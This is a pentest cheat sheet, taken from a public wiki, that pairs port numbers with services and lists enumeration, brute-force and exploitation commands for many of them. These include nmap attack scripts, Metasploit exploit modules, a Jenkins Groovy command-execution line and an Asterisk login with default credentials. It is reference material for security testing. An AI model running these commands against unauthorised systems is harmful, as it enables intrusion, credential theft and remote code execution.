Ports

Port Number Protocol Service & Application Commands
1 tcp blackice
7 tcp echo
11 tcp systat
13 tcp daytime
15 tcp netstat
17 tcp quote of the day
19 tcp character generator
21 tcp ftp nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 IP
22 tcp ssh msf > use auxiliary/scanner/ssh/ssh_login
nmap --script ssh2-enum-algos 192.168.108.197
nmap --script ssh-hostkey IP
nmap --script sshv1 192.168.108.197
23 tcp telnet msf > use auxiliary/scanner/telnet/telnet_login
nmap -p 23 --script telnet-brute --script-args IP userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s IP
nmap -p 23 --script telnet-encryption IP
nmap -p 23 --script telnet-ntlm-info IP
25 tcp smtp nmap -p 25 --script smtp-brute IP
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=domain] -pT:25,465,587 IP
nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com IP
nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=domain,smtp-open-relay.ip=address,...] -p 25,465,587 IP
nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=domain' -pT:25,465,587 IP
nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 IP
26 tcp ssh
37 tcp rdate
49 tcp TACACS+
53 tcp dns
53 udp dns
67 tcp DHCP
68 tcp dhclient
69 udp TFTP,BitTorrent
70 tcp Gopher
79 tcp Finger
80 tcp HTTP,malware
81 tcp HTTP,malware
82 tcp HTTP,malware
83 tcp HTTP
84 tcp HTTP
88 tcp Kerberos use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
102 tcp Siemens S7
110 tcp pop3
111 tcp RPC rpcinfo -p 192.168.1.111
msf >use auxiliary/scanner/nfs/nfsmount
Nfspy
119 tcp NNTP
123 tcp NTP
123 udp ntp ntpdc -n -c monlist IP
nmap -sU -p 123 -Pn -n --script ntp-info IP
nmap -sU -p 123 -Pn -n --script ntp-monlist IP
msf > use auxiliary/scanner/ntp/ntp_readvar
137 tcp NetBIOS nbtscan -A IP
139 tcp SMB enum4linux -a IP
rpcclient -U "" IP + srvinfo; enumdomusers; getdompwinfo; querydominfo; netshareenum; netshareenumall
143 tcp IMAP
161 udp snmp snmpcheck -p 161 -c public -t IP
snmpwalk -v1 -c public IP
msf > use auxiliary/scanner/snmp/snmp_enum
162 udp snmp
175 tcp IBM Network Job Entry
179 tcp BGP
195 tcp TA14-353a
264 Checkpoint Firewall
311 tcp OS X Server Manager
389 tcp ldap ldap://IP/dc=com
443 tcp https openssl s_client -host ADDR -port 443
sslscan ADDR
tlssled ADDR 443
nmap --script sslv2 ADDR
nmap --script ssl-cert ADDR
nmap --script ssl-date ADDR
nmap --script ssl-enum-ciphers ADDR
nmap --script ssl-google-cert-catalog ADDR
msf > use auxiliary/pro/web_ssl_scan
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf > use auxiliary/server/openssl_heartbeat_client_memory
445 tcp Microsoft-DS Active Directory, Windows shares
Microsoft-DS SMB file sharing
smbclient -U root -L IP
smbclient -U root //IP/tmp
rpcclient -U "" IP
msf > auxiliary/admin/smb/samba_symlink_traversal
465 tcp smtps
500 udp ike
502 tcp modbus
503 tcp modbus
512 tcp
513 tcp
514 tcp
515 tcp Line Printer Daemon
520 tcp RIP
523 tcp IBM DB2
554 tcp RTSP
587 tcp SMTP mail submission
623 tcp IPMI
626 tcp OS X serialnumbered
631 tcp CUPS Service error
636 tcp ldaps
771 tcp Realport
789 tcp Redlion Crimson3
873 tcp rsync rsync -a user@host::tools/
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' IP
nmap -p 873 --script rsync-list-modules IP
msf >use auxiliary/scanner/rsync/modules_list
902 tcp VMware authentication
953 BIND Contorl Port
992 tcp Telnet(secure)
993 tcp IMAPs
995 tcp POP3s
1023 tcp telnet
1025 tcp Kamstrup
1030 tcp RPC
1032 tcp RPC
1033 tcp RPC
1038 tcp RPC
1099 tcp Remote Method invocation use exploit/multi/misc/java_rmi_server
1194 tcp openvpn
1200 tcp Codesys
1234 udp udpxy
1202 tcp linknat
1433 tcp MS-SQL MSF>use auxiliary/scanner/mssql/mssql_ping
1434 udp MS-SQL monitor
1521 tcp Oracle tnscmd10g version/status -h IP
1604 Citrix, malware
1723 tcp pptp thc-pptp-bruter -v -u username -n 4 IP < pass.txt
1741 CiscoWorks
1833 MQTT
1900 tcp bes,UPnP
1911 Niagara Fox
1962 PCworx
2000 iKettle,MikroTik bandwidth test
2049 tcp nfs showmount --all IP
showmount --exports IP
mount -t nfs IP:/ /mnt/nfs/
Nfspy
2082 tcp cpanel
2083 tcp cpanel
2086 WHM
2087 WHM
2100 tcp Oracel XML DB Default Username/Passwords
2121 tcp ftp msf > use auxiliary/scanner/ftp/ftp_login
2123 GTPv1
2152 GTPv1
2182 Apache Zookeeper
2222 tcp SSH, PLC5, EtherNet/IP
2323 tcp telnet
2332 tcp Sierra wireless(telnet)
2375 Docker
2376 Docker
2404 IEC-104
2455 CoDeSys
2480 OrientDB
2628 Dictionary
2967 Symantec System Center Alert Management System
3000 ntop
3128 tcp squid
3299 tcp sap msf > use auxiliary/scanner/sap/sap_router_portscanner
3306 tcp mysql msf > auxiliary/scanner/mysql/mysql_login
nmap --script mysql-brute IP
nmap --script mysql-databases IP
nmap -p 3306 --script mysql-dump-hashes IP
--script-args='username=username,password=password' IP
nmap -p 3306 --script mysql-enum IP
nmap -p 3306 --script mysql-users IP
nmap -p 3306 --script mysql-query --script-args='query="query"[,username=username,password=password] IP'
3310 tcp ClamAV
3339 Oracle Web Interace
3386 GTPv1
3388 RDP
3389 RDP rdesktop -u guest -p guest IP -g 94%
rdp-sec-check IP
3541 PBX GUI
3542 PBX GUI
3632 tcp distccd msf > use exploit/unix/misc/distcc_exec
3689 DACP
3780 Metasploit
3787 Ventrilo
4022 udpxy
4369 tcp Erlang Port Mapper Daemon nmap -p 4369 --script epmd-info IP
4440 tcp rundeck
4500 IKE NAT-T(VPN)
4567 Modem web interface
4070 VertX/Edge door controller
4800 Noxa Nport
4911 Niagara Fox with SSL
4949 Munin
5006 MELSEC-Q
5007 MELSEC-Q
5008 NetMobility
5009 Apple Aitport Administrator
5038 tcp Asterisk Call Manager http://code.google.com/p/sipvicious/

$ ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111

Response: Success
Message: Authentication accepted
action: command
command: core show help
5432 tcp postgresql
5060 udp sip msf > use auxiliary/scanner/sip/options
5222 XMPP
5269 XMPP Server to Server
5353 mDNS
5357 Mirosoft-HTTP API/2.0
5432 Postgresql
5555 tcp hp data protector msf > use exploit/windows/misc/hp_dataprotector_cmd_exec
5577 Flux LED
5601 tcp kibana
5632 PCAnywhere
5672 RabbitMQ
5900 tcp vnc msf > use auxiliary/scanner/vnc/vnc_none_auth
msf > use auxiliary/scanner/vnc/vnc_login
msf > use exploit/multi/vnc/vnc_keyboard_exec
nmap --script vnc-brute -p 5900
nmap --script vnc-info -p 5900
5901 vnc
5938 TeamViewer
5984 CouchDB
5985 tcp winrm msf >use exploit/windows/winrm/winrm_script_exec
msf >use auxiliary/scanner/winrm/winrm_auth_methods
msf >use auxiliary/scanner/winrm/winrm_cmd
msf >use auxiliary/scanner/winrm/winrm_login
msf >use auxiliary/scanner/winrm/winrm_wql
6000 tcp x11 xwd -root -screen -slient -display 192.168.1.108:0 > out.xwd
convert out.xwd out.png
6379 tcp redis redis-cli -h 127.0.0.1 -p 6379
msf >use auxiliary/scanner/redis/file_upload
msf >use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/redis_server
6380 tcp redis
6082 tcp varnish
6667 tcp ircd backdoor msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
6881 BitTorrent
6969 TFTP,BitTorrent
7001 tcp weblogic
8080 tcp jekins Jekins Console
println "cmd.exe /c dir".execute().text

msf >use auxiliary/scanner/http/jenkins_enum
msf >use exploit/multi/http/jenkins_script_console
8083 tcp vestacp
8089 tcp jboss
8101 tcp apache karaf
8180 tcp apache tomcat msf > use exploit/multi/http/tomcat_mgr_deploy
8443 tcp https
8443 Symantec SEP Manager
8554 tcp rtsp
8649 tcp ganglia
9009 tcp Julia
9043 tcp WebSpeher
9090 Symantec SEP Manager
9151 tcp Tor Control
9160 Apache Cassandra
9200 tcp elasticsearch msf >use exploit/multi/elasticsearch/search_groovy_script
9418 tcp git
10000 tcp virtualmin/webmin
11211 tcp memcache
12174 tcp Symantec System Center Alert Management System
13579 Media Player classic web interface
17185 VxWorks WDBRPC
18083 tcp vbox server
27017 tcp mongodb msf >use auxiliary/scanner/mongodb/mongodb_login
$ mongo host:port/database
MongoDB shell version: 2.6.12
> help
28017 tcp mongodb
37777 Dahua DVR
38292 Symantec System Center Alert Management System
44818 EtherNet/IP
49153 WeMo Link
50000 tcp sap
50030 tcp hadoop
50070 tcp hadoop
51106 Deluge(HTTP)
54138 Toshiba PoS
55553 Metasploit
55554 Metasploit
62078 Apple iDevice
64738 Mumble

Links

  1. http://www.rfc-editor.org/search/rfc_search.php
  2. http://packetlife.net/
  3. https://www.leanpub.com/shodan

Originally taken from: https://github.com/nixawk/pentest-wiki/blob/master/3.Exploitation-Tools/Network-Exploitation/ports_number.md The MIT License (MIT)

Copyright (c) 2016 Vex Woo

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.